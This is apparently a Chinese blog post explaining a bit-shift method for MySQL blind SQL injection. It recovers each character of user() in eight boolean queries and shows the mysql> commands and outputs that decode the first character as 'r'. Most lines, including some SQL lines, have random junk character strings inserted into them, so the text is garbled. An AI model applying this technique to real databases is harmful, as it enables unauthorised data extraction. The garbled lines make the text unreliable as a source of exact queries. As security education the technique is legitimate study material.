关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位

  L' M  {+ `' g) }( ^2 o

下面将以查询mysql数据库当中user()的第一位为例:
/ y. x4 r$ q. {$ B! Y9 e


ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)



首先执行如下sql语句:



9 b& Z& o, V7 ~! Jmysql> select (ascii((substr(user(),1,1))) >> 7)=0;



8 E' O2 @6 M1 T6 [我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的
! E; u7 w5 M' j- d' n9 I" t8 X


7 ~: a& V0 t) F第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
0 W, y" @2 ^$ X4 R5 O9 t9 A
6 E) k2 f# T0 _" F

% {. o2 k* N$ {% ?# t' z如果运算结果为1,说明第一位为0,不为1

6 F# l6 Z% D7 g' R+ [# h5 e; l# Y

9 }6 Z5 a1 v/ q  M7 T; q, M$ U+————————————–+

/ i, b9 y" H. u# C4 V3 \, Z7 D1 D: _| (ascii((substr(user(),1,1))) >> 7)=0 |
! L8 `3 i$ s9 Y. g1 o7 W
2 M$ Z- _8 [/ e$ n' w  T3 E+ s+————————————–+
* c4 B, U5 w- S, ?  b, Q5 V! g
| 1 |
  h& c* G0 l+ p$ x6 i. H
( X5 Y- A% \* J9 q5 P+————————————–+
, P  z4 u' n8 L
1 row in set (0.00 sec)
$ Q' l: g/ A3 H# }! M- l
6 e+ ^+ R" A4 c9 p: o3 _* `, r3 g这样我们就确定这个8bit的ascii的第一位为0
: m8 a, x/ A  D1 L7 {) A  e& `
1 H  Z7 s6 _* i9 G

: @( n, E( @5 v* `- s4 M; g第二次我们来做6次右偏移来确定前两位
/ I$ r8 M& q' |6 i; I

3 r: S/ A: L- y
! G/ E4 R/ M6 B2 [1 L. \, I; K) \. k前两位可能是01或00,即依然可以与0做比较,
7 @4 G1 z) j- G" F
mysql> select (ascii((substr(user(),1,1))) >> 6)=0;

+————————————–+
6 m4 S- I. ]" X9 @
| (ascii((substr(user(),1,1))) >> 6)=0 |

+————————————–+

, P! H& l" J2 M6 N- Y| 0 |

' W/ n+ [7 G) {! `. M2 K- \. U' I+————————————–+
, i& a* g6 I' S  C
( R- w. V3 _, j7 j, C; W! h0 A5 y1 row in set (0.00 sec)
- s1 {! d! ?4 C, i) j! I( k# |


0 B1 Y2 B2 ?5 P6 H& w结果为0,即第二位为1
( J# X& W4 a3 Z8 Z) z

' z; s8 {4 `5 N
开始猜测前三位为010或011

% w' l- N  X( W- P
* n0 _1 N2 _1 N$ B  A
让我们看看010和011的ascii码是多少

2 ?( Q. A" ^  J  d" N- W

# e; I1 x8 d. D分别查询select b’011′ select b’010′
2 P' x9 B9 ?' p  o1 N, s+ X2 _
$ K5 p4 i1 B+ B% D9 w! v/ W8 @% Y
; s) U. ?2 E5 H  M
获得结果 010 = 2 011 = 3

. F% M; |  @( _9 g- y7 u. y
5 C3 K4 A+ F+ o# l0 W, u8 Y1 z
6 d  N" C9 e: Q5 N& m8 \& J0 v执行如下sql:
% v, e3 c! b4 A; W


3 M7 X- d" H5 p; C* U8 k- Omysql> select (ascii((substr(user(),1,1))) >> 5)=2;
9 Q' P1 E% H# u4 X1 O2 Y% n
% @! O* ^- d  i* V+————————————–+
% \" w8 A" D$ m" P% }0 c% V+ \
/ c! t; O& R9 z1 t: S6 c. T4 @| (ascii((substr(user(),1,1))) >> 5)=2 |

2 I! z/ _" S: ]! p* y+————————————–+

, }* g* \8 a1 A" Y" D| 0 |
$ n9 x/ A& _  S
+————————————–+
* I% {( O2 @: W; K8 q# {3 f
即前三位不为010,而是011

8 N  H1 u/ ]/ `  K6 P

直到获得最后一位
% ^% |% G; x) m


最终结果为:01110010

) ^1 S1 U2 v2 E! z0 f1 f, y
6 U' r2 Q4 C$ T( |. v
转换一下:
6 r) C) y1 n# G( n6 w2 h7 z


select b’01110010′
+ x* f/ E4 [* A3 ~3 h7 v


( u0 v/ g" J. k$ ]* R查询结果
/ h/ k' j+ k' K3 f


+————-+
! z" n! v* C! S8 i/ A8 c
  C5 W! `) Z4 e* n- x: U: e| b’01110010′ |

+————-+
3 q$ A- x8 s% M1 g. \6 F* T
, M3 v6 |2 V6 i$ B! c| r |

# _8 J% `1 P! [3 P+————-+
. g# N3 H# R+ g0 s7 _8 G6 Q
1 row in set (0.00 sec)
& `$ i+ F1 p$ R# j$ R2 o


这样我们就获得了user()的第一位.其它位依此类推

3 m. T' [: `1 j& z' [, z! y